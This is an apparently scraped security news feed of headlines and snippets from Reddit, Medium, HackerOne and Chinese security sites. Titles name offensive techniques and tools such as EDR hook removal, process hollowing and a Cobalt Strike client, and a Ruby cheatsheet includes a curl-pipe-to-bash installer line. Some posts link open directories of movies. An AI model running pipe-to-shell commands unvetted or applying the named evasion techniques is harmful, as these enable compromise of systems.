    Response Manipulation leads to Admin Panel Login Bypass at https://admin.indevice.sonymobile.com/
    Sony disclosed a bug submitted by 0x2374: https://hackerone.com/reports/1508661
    Signup with any Email and Enable 2-FA without verifying Email
    Cloudflare Public Bug Bounty disclosed a bug submitted by imtheking: https://hackerone.com/reports/1543259 - Bounty: $350
  • Open

    Ideas for learning projects?
    I have a degree and a help desk background. I have a lot of experience with Linux and virtualization from hobby projects. I want to start on a new project that will help me build strong foundational skills to prepare for the cce exam and for moving my career into dfir. My question is 2-fold: What might be a good project? And what skills should I look to prioratize / develop? submitted by /u/Of_Jotunheimr [link] [comments]
    view cluster option greyed out in encase
    im trying to view this evidence file and the view cluster option in the disk view is greyed out .what do you think is the cause? submitted by /u/shalnark90 [link] [comments]
    Getting a start in the Digital Forensics field
    So I'm about to finish school in the Digital Forensics field and I'm trying to look for a start in the field already, but having trouble doing so. The only experience I really have is what I've learned in school. I'm coming from mainly a retail work experience history. There any advice that anyone can provide that may lead me in the right direction? I'd greatly appreciate any help anyone can provide. submitted by /u/DeviantWolfe [link] [comments]
  • Open

    GitHub - thiagopeixoto/massayo: Massayo is a small proof-of-concept Rust library which removes AV/EDR hooks in a given system DLL by loading a freshy copy from disk and replacing the .text section of the currently loaded DLL
    submitted by /u/thewatcher_ [link] [comments]
    The seventh way to call a JavaScript function without parentheses
    submitted by /u/0xdea [link] [comments]
    How a Script Kiddie and 25 Lines of Python Could Theoretically Devastate America’s Gas Stations
    submitted by /u/entropydaemon9 [link] [comments]
    Redeye is a platform to cover all aspects of red team engagement (data management, red team operation management, etc.)
    submitted by /u/Idov31 [link] [comments]
    Let’s Encrypt is turning on new infrastructure to support revoking certificates via Certificate Revocation Lists
    submitted by /u/c0r0n3r [link] [comments]
    Data-Centric Security: Threat Hunting based on Zipf’s Law
    submitted by /u/ditrizna [link] [comments]
    The Anatomy of a Malicious Package
    submitted by /u/ambray_ [link] [comments]
  • Open

    Intro to C2
    Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment! Continue reading on Medium »
    Red Team Part 4 — Red Team OPSEC | TryHackMe
    Hello world and welcome to HaXeZ, where today we’re continuing the Red Team path on TryHackMe and looking at OPSEC. In essence, TryHackMe… Continue reading on Medium »
    GitHub: The Red-Teamer’s Cheat-Sheet
    This blog curated by experts at Komodo Consulting helps you understand about GitHub red-teamer’s cheat sheet. GitHub has become one of the… Continue reading on Medium »
  • Open

    Microsoft investigates Iranian attacks against the Albanian government
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    $100k Bug Bounty for QuickSwap’s V3 Beta: Dragons Eat Bugs
    QuickSwap is offering up to $100,000 to users who detect and privately report any vulnerabilities pertaining to our V3 smart contracts. Continue reading on Medium »
    Essential RECON Tools
    In this article, I’ll discuss my favorite recon tools which I often use in Bug Bounty. And a few years ago, I posted a Twitter post by… Continue reading on Medium »
    Privacy Violation In Chat System (Report Writeup)
    Report from Private Program on Hackerone Continue reading on Medium »
    Broken Access Control
    Hey folks, hope you all are doing well! In OWASP Top 10 2021, the Broken Access Control (BAC) grabbed the first position with the most… Continue reading on Medium »
    How I DIDN’T get an RCE in a $200 Billion company — Bug Bounty
    I was hunting for CVE-2021–36356 on my subdomain list of over 1,000,000+ subdomains, and finally got a hit… Continue reading on Medium »
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    What are Bug Bounties? And why are they important?
    Introduction Continue reading on Medium »
  • Open

    Meraki firewall configuration analysis
    I've been tasked with performing a secure configuration review for Meraki firewalls. I wanted to see if anyone had any suggestions such as tools or manual guides to perform such a review. Normally, I'd use Nipper to perform such an audit, but these devices aren't supported. Does anyone have experience in this? It would be greatly appreciated if anyone had any information. submitted by /u/ruarchproton [link] [comments]
  • Open

    SecWiki News 2022-09-12 Review
    [HTB] Bart Writeup by 0x584a SecWiki周刊(第445期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-12 Review
    [HTB] Bart Writeup by 0x584a SecWiki周刊(第445期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Ruby Cheatsheet
    🔍 Introduction Ruby는 자연스럽게 읽히고 쓰기 쉬운 우아한 문법을 가지고 있는 언어입니다. 철학 자체가 인간 중심의 설계다 보니 뛰어난 가독성을 가졌고 언어 자체도 쉽게 사용할 수 있도록 고안되었습니다. 그리고 오픈소스이며 순수 객체 지향 프로그래밍 언어입니다. 그래서 정수, 문자열 등 모든 데이터 형식은 객체입니다. VHLL (Very High-Level Lanauge) Pure OOP (Object-Oriented Programming) Multiple Platforms But in fact we need to focus on humans, on how humans care about doing programming or operating the application of the machines. Matz # Greeter 클래스 class Greeter def initialize(name) @name = name.capitalize end def salute puts "Hello #{@name}!" end end # 새 객체 생성 g = Greeter.new("world") # "Hello World!" 출력 g.salute 📜 Style Guide https://rubystyle.guide/ 😎 Awesome Resources Awesome Ruby Ruby Patterns 🎛 RVM Macos의 경우 기본적으로 Ruby가 시스템에 설치되어 있습니다. 그러나 다른OS나 특정 루비 버전 설치가 필요한 경우가 있는데, 이 때는 직접 시스템에 설치하는 것 보다 rvm이나 rbenv 같은 Version Manager를 사용하는 것이 좋습니다. # Install RVM curl -sSL https://get.rvm.io | bash -s stable # Install/Use Ruby 3.0 rvm install 3.0.0 rvm use 3.0.0 💎 Gem Gem은 Ruby의 패키지 관리자입니다. gem 명령을 통해 원하는 루비 기반의 도구나 라이브러리를 설치/삭제/검색할 수 있습니다. # 설치 gem install yaml # 삭제 gem uninstall yaml # 검색...
    Rake(Ruby Make)
    Rake는 Ruby에서 사용되는 build utility로 Make유사합니다. rake란 이름 또한 ruby + make 에서 만들어진 단어로 일반적인 Ruby application과 Rails 등 여러가지 환경에서 개발 도구로써 사용됩니다. A make-like build utility for Ruby. 오늘은 단순한 build task 부터 개발을 위한 여러가지 기능들 까지 가능한 Rake에 대해 이야기하려고 합니다. Installation gem install rake Make/Run Task Rake는 Rakefile 을 통해 관리됩니다. 해당 파일에 task로 명시할 수 있습니다. task는 루비 코드로 작성할 수 있습니다. task :env do puts ENV['PHASE'] end Rakefile을 만든 이후에는 rake 명령으로 실행하거나 리스트를 볼 수 있습니다. 자주 사용하는 flag는 아래와 같습니다. # Rakefile rake -f # 지정한 rakefile을 기준으로 실행합니다. # Show rake -T # 실행 가능한 tasks를 출력합니다. rake -AT # 모든 tasks를 출력합니다. # Run rake # default rake 작업을 실행합니다. rake # 지정한 task를 실행합니다. # -j, --jobs 병렬 처리 시 동시에 실행할 task의 최대 갯수를 지정합니다. # -m, --multitask 모든 task를 병렬로 처리합니다. Tricks Run rb file rakefile 내부에 코드를 직접 정의하지 않더라도 ruby로 실행할 파일을 명시할 수 있습니다. task :run do ruby 'tasks/run.rb' end Default task task default: 로 기본 rake task를 명시할 수 있습니다. task default: %w[test] task :test do ruby "test/unittest.rb" end Namespace Namespcae는 여러 Task를 그룹화하여 관리할 수 있는 기능입니다. namespace로...
  • Open

    NPM 供应链安全最佳实践指南
    本文旨在介绍使用 NPM 包管理器时的供应链安全最佳实践,由 OSSF 开源开发者最佳实践工作组总结发布。
    FreeBuf早报 | 三星因数据泄露面临集体诉讼;中科大超3000名师生中招钓鱼邮件
    三星允许未经授权的第三方设法从该公司的美国系统访问和窃取了客户信息,包括姓名、生日、联系信息和产品注册信息等。
    Tomcat Valve 型内存马流程理解与手写EXP
    Valve 型内存马是基于 Servlet 内存马来实现的,但是在表现形式上面会稍微有一点区别。
  • Open

    Video Blog: Using DLL Persist to Avoid Detection
    During an Incident Response case, the TrustedSec IR team came across a novel method used by an attacker to maintain access to the target’s servers. After gaining access to the systems, the attacker then modified a DLL required by a service to include malicious code. This video demonstrates a similar process for embedding malicious code... The post Video Blog: Using DLL Persist to Avoid Detection appeared first on TrustedSec.
  • Open

    ‍Thick Client Pentest, Out-of-band XXE, Bug Hunting Resources, RDP, LogonTypes, PowerShell…
    No content preview
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    How I found 3 rare security bugs in a day
    No content preview
    New technique 403 bypass lyncdiscover.microsoft.com
    No content preview
    Take Confusion Out of IAM Policies, AWS S3 Bucket Policies and AWS S3 ACLs
    No content preview
    Raccoon Stealer v2 Malware Analysis
    No content preview
    How To Perform Command Injection Attacks (DVWA) For Aspiring Hackers! — StackZero
    No content preview
    How to prevent more than 200 million users from using Google services
    No content preview
  • Open

    ‍Thick Client Pentest, Out-of-band XXE, Bug Hunting Resources, RDP, LogonTypes, PowerShell…
    No content preview
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    How I found 3 rare security bugs in a day
    No content preview
    New technique 403 bypass lyncdiscover.microsoft.com
    No content preview
    Take Confusion Out of IAM Policies, AWS S3 Bucket Policies and AWS S3 ACLs
    No content preview
    Raccoon Stealer v2 Malware Analysis
    No content preview
    How To Perform Command Injection Attacks (DVWA) For Aspiring Hackers! — StackZero
    No content preview
    How to prevent more than 200 million users from using Google services
    No content preview
  • Open

    ‍Thick Client Pentest, Out-of-band XXE, Bug Hunting Resources, RDP, LogonTypes, PowerShell…
    No content preview
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    How I found 3 rare security bugs in a day
    No content preview
    New technique 403 bypass lyncdiscover.microsoft.com
    No content preview
    Take Confusion Out of IAM Policies, AWS S3 Bucket Policies and AWS S3 ACLs
    No content preview
    Raccoon Stealer v2 Malware Analysis
    No content preview
    How To Perform Command Injection Attacks (DVWA) For Aspiring Hackers! — StackZero
    No content preview
    How to prevent more than 200 million users from using Google services
    No content preview
  • Open

    Announcing The Auto-Refreshing Official Kubernetes CVE Feed
    Article URL: https://kubernetes.io/blog/2022/09/12/k8s-cve-feed-alpha/ Comments URL: https://news.ycombinator.com/item?id=32806366 Points: 1 # Comments: 0

  • Open

    How big is your IT Security team and how do you people manage
    Just curious more so on how big your IT Security team is, where you are based geographically and what are the vibes like submitted by /u/securm0n [link] [comments]
    How to construct API POST request without documentation?
    Recently I tried Vulnerable REST API which can be found at https://github.com/erev0s/VAmPI I don't have any issue with GET request as all I need is the right url without any http body $ curl 127.0.0.1:5000 { "message": "VAmPI the Vulnerable API", "Help": "VAmPI is a vulnerable on purpose API. It was created in order to evaluate the efficiency of third party tools in identifying vulnerabilities in APIs but it can also be used in learning/teaching purposes." } For POST request, http body is required to send necessary data to the API endpoints. Let's take a look at these 2 which can be found on the github page. POST /users/v1/register Register new user POST /users/v1/login Login to VAmPI Unfortunately, these are the only information given and no documentation on how to craft the request (http body). Since I don't know the http body format for these 2 POST request, I'm getting 400 BAD REQUEST which is expected. Request POST /users/v1/login HTTP/1.1 Host: 127.0.0.1:5000 Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 Request POST /users/v1/register HTTP/1.1 Host: 127.0.0.1:5000 Accept: */* Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 Similar Response for both Requests HTTP/1.0 400 BAD REQUEST Content-Type: application/problem+json Content-Length: 115 Server: Werkzeug/1.0.1 Python/3.9.12 { "detail": "None is not of type 'object'", "status": 400, "title": "Bad Request", "type": "about:blank" } How do I construct the right http body for POST request if I don't have knowledge/documentation about that? submitted by /u/w0lfcat [link] [comments]
  • Open

    anyone know how to fix this encase problem?
    submitted by /u/shalnark90 [link] [comments]
    Hash mismatch
    I did a logical disk acquisition on a USB stick using DD and calculated the SHA-1 and MD-5 hash using Windows' builtin certutil tool. I then had FTK Imager calculate/verify the hash of the image generated by DD and they matched, as expected. On an experiment, I did a logical disk capture of the physical USB stick through FTK, generated an image in the .E01 format then compared the calculated hash values between FTK's builtin hash calculation tool and Windows' certutil of that FTK generated .E01 file. To my utter surprise, they don't match. What is going on here? Can someone chime in? Video Proof ​ https://reddit.com/link/xbk9fo/video/ibztcd1fw8n91/player ​ submitted by /u/jjThomson69 [link] [comments]
  • Open

    How requests-ip-rotator for bypassing rate limiting got me 6th on the leaderboard for ipv4.games
    submitted by /u/fiasco_averted [link] [comments]
    "Pull Request Hijacking" - bypassing code review enforcement in GitHub
    submitted by /u/dotanoam [link] [comments]
    Thoughts on the use of NoVNC for phishing campaigns
    submitted by /u/gid0rah [link] [comments]
  • Open

    Google Drive question....
    I am able to find open Google Drives and add various movies to my drive for later download. Anything 8 gigs will start downloading and as it gets close to completion, abruptly ends/crashes. (I don't recall the specific error rn.) I use Chrome. I have done the usual internet research to no avail. Does anyone know why this is happening? Firewall? Memory issue? A timing issue where the file has to download in a certain amount of time (1 hour time limit)? Chrome addons? A known issue with file size? This issue hasn't always been there. It seems to have started earlier this year. Any help would be appreciated. submitted by /u/Jazr_Dude [link] [comments]
    Lots of movies-English and other languages. - dig around in the directories
    http://103.156.66.58/m1t1/movies/ submitted by /u/looster2018 [link] [comments]
  • Open

    Blind SQL-Injection API (SOAP!)
    Exploiting WSDLs with Wsdler Continue reading on Medium »
    AWS Wish List
    Make a wish. It might be granted! #awswishlist Continue reading on Cloud Security »
    Lets talk about methodology
    I’ve talked about methodology before on this blog when it’s comes to how to learn better whilst doing bug bounty or pentesting but I’ve… Continue reading on Medium »
    My First Valid Bug “Open Redirection”
    Hey everyone, I am SYRINE. Cyber Security Enthusiast, eJPT Certified, and currently focusing on bug bounty. Continue reading on Medium »
    How to hack without Linux Part :-2
    Hii all, I’m back after a cool break, so where is my system buddy? As a promise, I will continue the series How to Hack with Linux, so… Continue reading on Medium »
  • Open

    SecWiki News 2022-09-11 Review
    物理模拟触屏点击 by 路人甲 PyPI 网络钓鱼活动分析 by 路人甲 关于那WebSocket劫持的二三事 by 路人甲 网络安全的三大支柱和攻击向量 by ourren 网络智能流量编排探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-11 Review
    物理模拟触屏点击 by 路人甲 PyPI 网络钓鱼活动分析 by 路人甲 关于那WebSocket劫持的二三事 by 路人甲 网络安全的三大支柱和攻击向量 by ourren 网络智能流量编排探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    Access to arbitrary file of the Nextcloud Android app from within the Nextcloud Android app
    Nextcloud disclosed a bug submitted by luchua: https://hackerone.com/reports/1408692 - Bounty: $250
  • Open

    SPY NEWS: 2022 — Week 36
    Summary of the espionage-related news stories for the Week 36 (September 4–10) of 2022. Continue reading on Medium »
  • Open

    HP Support Assistant Has a DLL Hijacking Vulnerability
    Article URL: https://www.ghacks.net/2022/09/08/hp-support-assistant-has-a-dll-hijacking-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32797230 Points: 1 # Comments: 0

  • Open

    Creating and configuring a Honeypot account in Active Directory
    Hi readers, here we will be looking into the detection of password spraying attempts by adversaries. Specifically, we will be creating an… Continue reading on Medium »
    Red Team Part 2 — Red Team Engagements | TryHackMe
    Hello world and welcome to Haxez, in this post I’m going to be talking about Red Team Engagements. Again, for those who haven’t been… Continue reading on Medium »
  • Open

    Ultimate Nokia Ringtone Collection, a collection of 2500+ Nokia ringtones and alerts
    submitted by /u/fusoxide [link] [comments]
    Comics ! ...... and books
    http://ns377932.ip-5-196-89.eu/freecomics/books/Unknown/ submitted by /u/looster2018 [link] [comments]
    Tons of mechanical , automotive and RV .Pdfs....
    https://www.wanderlodgeownersgroup.com/downloads/ submitted by /u/looster2018 [link] [comments]
  • Open

    Explosives hidden in toys, Ukraine
    Open source verification review, analyzing cases of mined toys Continue reading on Medium »
    Finding Geolocation using OSINT
    TRYHACKME: Geolocating Images Continue reading on System Weakness »
    OSINT Resources for Pentesters
    As those of us know, OSINT stands for open source intelligence, which refers to any information that can legally be gathered from free… Continue reading on Medium »
    Mobile database with information leaks
    Today there is a large number of data leaks from various online services. Continue reading on Medium »
    Looking Back: An Overview of Pakistan’s first OSINT Championship
    We received more than two dozen applications from individuals of Pakistani origin to compete in OSINT Championship-2022. After necessary… Continue reading on Medium »
  • Open

    CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage
    Internet Bug Bounty disclosed a bug submitted by gquadros_: https://hackerone.com/reports/1652042 - Bounty: $2000
  • Open

    x86matthew - WriteProcessMemoryAPC - Write memory to a remote process using APC calls
    submitted by /u/jeandrew [link] [comments]
  • Open

    Exploiting preshared machine keys
    what are machine keys? Continue reading on Medium »
    How to Find SQL Injection Attack Vulnerabilities in 2022?
    SQL Injection (also known as Structured Query Language injection) is one of the most popular and severe vulnerabilities out there. Continue reading on Medium »
    How I found 3 rare security bug in a day
    Hello everyone, Continue reading on InfoSec Write-ups »
    Introducing 44 cybersecurity YouTube channels (final version):
    1. Hak5 — General cybersecurity coverage. 2. The XSS Rat — Everythug bounty hunting. 3. ITProTV — General cybersecurity coverage.  4… Continue reading on Medium »
    How to Learn Manual SQL Injection for OSCP(Step by Step)
    If you have found sql injection attacks to be confusing and are preparing for oscp but your manual sql injection part is not clear,I am… Continue reading on Medium »
    Capture The Bug is a finalist in the New Zealand Reseller Awards
    Awesome News🎉 Continue reading on Medium »
  • Open

    SecWiki News 2022-09-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    DangerousSavanna 针对非洲法语区金融机构的攻击行动
    研究人员发现中非和西非超过 85% 的金融机构多次遭受破坏性网络攻击,调查发现是受利益驱动的黑产组织 DangerousSavanna 进行攻击的。
  • Open

    Is there any particular reason as to why an examiner would encrypt a disk/file they are examining?
    Apologies if I come across as ignorant, but is there any particular reason as to why an examiner would encrypt a file/disk/image they are looking at? Why would someone conceivably make their life harder, given that they'd have to decrypt the disk every single time before examining it? submitted by /u/jjThomson69 [link] [comments]
  • Open

    AmCache Revisited
    Not long ago, I posted about When Windows Lies, and that post really wasn't so much about Windows "lying", per se, as it was about challenging analyst assumptions about artifacts, and recognizing misconceptions. Along the same lines, I've also posted about the (Mis)Use of Artifact Categories, in an attempt to address the reductionist approach that leads analysts to oversimplify and subsequently misinterpret artifacts based on their perceived category (i.e., program execution, persistence, lateral movement, etc.). This misinterpretation of artifacts can lead to incorrect findings, and subsequently, incorrect recommendations for improvements to address identified issues. I recently ran across this LinkedIn post that begins by describing AmCache entries as "evidence of execution", which is so…
  • Open

    Is anyone aware of a Microsoft Excel version of the CVSS calculator?
    Is anyone aware of a Microsoft Excel version of the CVSS version 3.1 calculator? My aim is to be able to dynamically download a list of vulnerabilities and individually score them within Excel using a list of environmental and temporal metrics. https://www.first.org/cvss/calculator/3.1 submitted by /u/EmergencyShow [link] [comments]
    Where can I report the IP of a command and control server?
    I had the misfortune of having one of my servers hacked yesterday. Fortunately, I caught it early and not much damage was done. I am currently studying for the flare-on malware reversing competition so I saw this as an opportunity to reverse a real-world sample. It turned out to be the dropper and scanner portion of the dota3 miner. It wasn't up long enough to install the miner portion. After removing the server from the network, I cleaned its mess up and I managed to reverse it down to its Perl source. The IP of the CC server and some publicly known credentials are in the source. Nmap shows that the machine is actually up with the correct ports open. Is there a best place to report this IP to for possible takedown? EDIT: Digging around has led me to this article. https://www.countercraftsec.com/blog/post/cve-2021-4034-vulnerability-exploited-russia-vs-ukraine-situation/ The forensics that I did looks like a different deployment method but the payload is basically the same. Also the strings are written in Portugeese. submitted by /u/jerryrw [link] [comments]
  • Open

    Process Hollowing in C#. Shellcode Injection Techniques.
    Another way for shellcode execution by using process hollowing. ​ https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-2/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Avoiding Memory Scanners
    submitted by /u/dmchell [link] [comments]
  • Open

    How I found 3 RXSS on the Lululemon bug bounty program
    No content preview
    Reflected XSS DVWA — An Exploit With Real World Consequences — StackZero
    No content preview
  • Open

    How I found 3 RXSS on the Lululemon bug bounty program
    No content preview
    Reflected XSS DVWA — An Exploit With Real World Consequences — StackZero
    No content preview
  • Open

    How I found 3 RXSS on the Lululemon bug bounty program
    No content preview
    Reflected XSS DVWA — An Exploit With Real World Consequences — StackZero
    No content preview
  • Open

    Silifuzz: Fuzzing CPUs by Proxy
    Article URL: https://github.com/google/silifuzz Comments URL: https://news.ycombinator.com/item?id=32787131 Points: 3 # Comments: 0

  • Open

    Red Team Part 1 — Red Team Fundamentals | TryHackMe
    Hello world and welcome to Haxez, in this post I’m going to be going through the first room in the Red Team learning path on TryHackMe… Continue reading on Medium »
    Atomic Red Team — DumpLSASS
    Red Canary Threat Research released 2 new AtomicTestHarnesses — Continue reading on Medium »
    Some Important Hacking Terminologies
    We live in the era of technology where everything related to automation has escalated very fastly and along this, it has been seen that… Continue reading on Medium »
    TryHackMe — Red Teaming | Initial Access | Part-3
    This would be third write-up of the Red Teaming learning Path Series, We would start with second chapter Initial Access; Explore the… Continue reading on Medium »
    Red Team Assessment And Penetration Testing Service
    Red Team Assessment And Penetration Testing Service Continue reading on Medium »
  • Open

    SiliFuzz - Fuzzing CPUs by proxy
    submitted by /u/sanitybit [link] [comments]
    “GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs
    submitted by /u/sanitybit [link] [comments]
    Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection
    submitted by /u/CyberMasterV [link] [comments]
    Spotlight: Occlum open source software for Intel SGX
    submitted by /u/laramontoyalaske [link] [comments]
    Fuzzing beyond memory corruption: Finding broader classes of vulnerabilities automatically
    submitted by /u/jeandrew [link] [comments]
  • Open

    Account Takeover by HTML Injection
    Hello readers! Continue reading on Medium »
    SocialPwned OSINT tool
    SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks like Instagram, Linkedin and… Continue reading on Medium »
  • Open

    Open-Source Intelligence: How to Integrate Modern OSINT into Mainstream Intelligence
    Open Source Intelligence (OSINT) is currently undergoing a major transformation as a tool in the intelligence cycle. OSINT has been a… Continue reading on Medium »
    SocialPwned OSINT tool
    SocialPwned is an OSINT tool that allows to get the emails, from a target, published in social networks like Instagram, Linkedin and… Continue reading on Medium »
  • Open

    SecWiki News 2022-09-09 Review
    SharpHostInfo: 一款快速探测内网主机信息工具 by ourren 内网渗透软件-BloodHound使用指南 by ourren 基于netfilter的后门 by ourren JAVA常用框架SQL注入审计 by ourren 国家级网络攻击能力象限漫谈 by Avenger Govulncheck:Go语言供应链漏洞检测工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-09 Review
    SharpHostInfo: 一款快速探测内网主机信息工具 by ourren 内网渗透软件-BloodHound使用指南 by ourren 基于netfilter的后门 by ourren JAVA常用框架SQL注入审计 by ourren 国家级网络攻击能力象限漫谈 by Avenger Govulncheck:Go语言供应链漏洞检测工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    Cleartext storage of sensitive information at https://staging.status.ai-apps-comms.ibm.com/env can lead to account takeover of several IBM employees
    IBM disclosed a bug submitted by zere: https://hackerone.com/reports/1670586
  • Open

    ManageEngine vulnerability posed code injection risk for password management
    Article URL: https://portswigger.net/daily-swig/manageengine-vulnerability-posed-code-injection-risk-for-password-management-software Comments URL: https://news.ycombinator.com/item?id=32778824 Points: 2 # Comments: 0
  • Open

    Snapchat geo location format
    ​ I'm trying to help sort through some snapchat geo location data to determine a person's location based on snapchat records, and can't seem to find any info the format used in the reports. While this is not an actual coordinate I'm looking at it's formatted as: Long: -86.234 ± 9.16 meters Lat 36.234 ± 13.45 meters While the first part is pretty obvious, I can't seem to find any info on what the ± 9.16 meters part means. I've looked through various articles on formats of lat and long, but nothing includes meters. Can anyone explain how the meters work? Entering the coordinates into google maps as written doesn't work. I can't find any sites that have the option to enter ± X meters in the coordinates either. submitted by /u/Financial-Tourist272 [link] [comments]
  • Open

    Insufficient Logging and Monitoring
    Introduction Continue reading on InfoSec Write-ups »
    Retired from HackTheBox — Detailed Walkthrough
    No content preview
    Anti-Reversing Techniques (Part 1)
    No content preview
    Malware Analysis — NanoCore Rat
    No content preview
    Malware Analysis — FFDroider
    No content preview
    [Malware Analysis #3] — Disk Writer
    No content preview
  • Open

    Insufficient Logging and Monitoring
    Introduction Continue reading on InfoSec Write-ups »
    Retired from HackTheBox — Detailed Walkthrough
    No content preview
    Anti-Reversing Techniques (Part 1)
    No content preview
    Malware Analysis — NanoCore Rat
    No content preview
    Malware Analysis — FFDroider
    No content preview
    [Malware Analysis #3] — Disk Writer
    No content preview
  • Open

    Insufficient Logging and Monitoring
    Introduction Continue reading on InfoSec Write-ups »
    Retired from HackTheBox — Detailed Walkthrough
    No content preview
    Anti-Reversing Techniques (Part 1)
    No content preview
    Malware Analysis — NanoCore Rat
    No content preview
    Malware Analysis — FFDroider
    No content preview
    [Malware Analysis #3] — Disk Writer
    No content preview
  • Open

    WordPress插件曝出零日漏洞,已被积极在野利用
    一个名为BackupBuddy的WordPress插件存在一个零日漏洞,正被积极利用。
    记一次服务器入侵事件的应急响应
    8月某日,客户官网被黑,需在特定时间内完成整改。为避免客户业务受到影响,实验室相关人员第一时间展开本次攻击事件的应急处理。
    pretender:一款功能强大的红队MitM安全测试工具
    pretender是一款功能强大的红队MitM安全测试工具,专为红队研究人员设计。
    《互联网弹窗信息推送服务管理规定》发布,弹窗一键搞定
    随着互联网的飞速发展和移动应用程序的广泛应用,弹窗信息推送服务不断出现新情况新问题,需适应形势予以规范。
    原来用户隐私是这样被泄露:超八成搜索网站将信息出售
    虽然“隐私”在数字化的世界已经无处安放,但我们却很少去认真思考,隐私究竟是怎样被泄露的?
    葡萄牙武装总参谋部遭网络攻击,数百份北约机密文件泄露
    葡萄牙武装部队总参谋部(EMGFA)遭到网络攻击,黑客窃取了大量北约机密文件。
    如何应对堡垒机安全风险?| FreeBuf甲方群话题讨论
    堡垒机作为服务器和网络安全控制的系统,当其遇到安全风险,大家该如何”排忧解难“?
    一次对BC网站的渗透测试
    此渗透测试后已将所有信息移交警方,请勿用于非法用途。
  • Open

    cobaltstrike-headless - Headless CobaltStrike client
    submitted by /u/CodeXTF2 [link] [comments]
  • Open

    Xalan-J XSLT 整数截断漏洞利用构造(CVE-2022-34169)
    作者:thanat0s@360高级攻防实验室 原文链接:http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/ 0x00 前言 这是第一次遇到与 Java Class 字节码相关的漏洞(CVE-2022-34169),由于漏洞作者提供的利用脚本未能执行成功,所以根据漏洞描述结合自己的理解尝试进...
  • Open

    Xalan-J XSLT 整数截断漏洞利用构造(CVE-2022-34169)
    作者:thanat0s@360高级攻防实验室 原文链接:http://noahblog.360.cn/xalan-j-integer-truncation-reproduce-cve-2022-34169/ 0x00 前言 这是第一次遇到与 Java Class 字节码相关的漏洞(CVE-2022-34169),由于漏洞作者提供的利用脚本未能执行成功,所以根据漏洞描述结合自己的理解尝试进...
  • Open

    How secure are URL's to files in SharePoint OneDrive?
    I've seen a place with a lot of URL's to sharepoint and onedrive files. I can't remember the context or how I saw these URL's. Must have been in some admin center. First thing that popped into my head was "security issue". As far as I can tell, you can only share files to specific people or people within the organization. I just checked this using my own Microsoft 365. Are there any security issues with these URL's? Thanks! submitted by /u/damienhull [link] [comments]

  • Open

    On The Wire Writeup
    Fishing for clues requires an eye for detail Continue reading on The Sleuth Sheet »
    How to Find a Dossier on a Citizen of Any Country
    EffectGroup is an open source research platform that enables researchers to easily collect, analyze, and visualize data. Continue reading on The Sleuth Sheet »
    Interview: Venessa Ninovic
    Intel Inquirer, Intelligence Analyst, Speaker Continue reading on Medium »
    Fahad Nabeel wins the Pantellica OSINT Championship (2022)
    I’m delighted to announce that Fahad Nabeel has secured first position to earn the title of OSINT Champion (2022) in Pakistan. Continue reading on Medium »
    What Are Sock Puppet Accounts
    I had this question a while back when I noticed that I have been interacting with a sock puppet account for years, I wondered what made it… Continue reading on Medium »
    What is OSINT?
    What is OSINT, and how do you pronounce that? Let’s start with the latter and work our way from there. Continue reading on Medium »
    Quiztime 29 Aug 22
    I saw @bayer_julia’s @quiztime quiz on twitter on 29 August 2022: https://twitter.com/bayer_julia/status/1564355252349984770 and thought… Continue reading on Medium »
    Что такое HUMINT и почему вдруг про него все резко вспомнили?
    Что такое HUMINT? Continue reading on Medium »
    OSINT Information Gathering with Informer
    As everyone knows information gathering in cyber security and ethical hacking is very important. The more you know about the target, the… Continue reading on Medium »
  • Open

    What kind of housekeeping tasks do you do frequently at work?
    Hi Was wondering what kind of housekeeping cleaning tasks you do frequently at work relating to cybersecurity For example, every month we: Go through the list of current users on each of our security systems and in turn remove or disable inactive users Check to see users that have not logged onto the network over 90 days in Azure AD Check user groups Curious to see what else people do submitted by /u/securm0n [link] [comments]
    Netgear Routers say I'm getting DoS attacks and knock out my network. Spectrum says nothing is wrong on their side. Any advice?
